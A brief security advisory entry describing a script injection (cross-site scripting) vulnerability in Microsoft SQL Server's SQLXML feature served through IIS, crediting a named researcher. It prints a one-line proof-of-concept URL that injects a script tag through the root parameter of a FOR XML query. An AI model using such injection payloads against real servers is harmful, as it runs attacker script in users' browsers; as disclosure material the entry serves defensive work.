|
Microsoft SQL Server SQLXML Script Injection Vulnerability
The following proof of concept was provided by Matt Moore <matt@westpoint.ltd.uk>: IIS-server/Northwind?sql=SELECT+contactname,+phone+FROM+Customers+FOR+XML&root= <SCRIPT>alert(document.domain)</SCRIPT> |
|
 Privacy Statement |
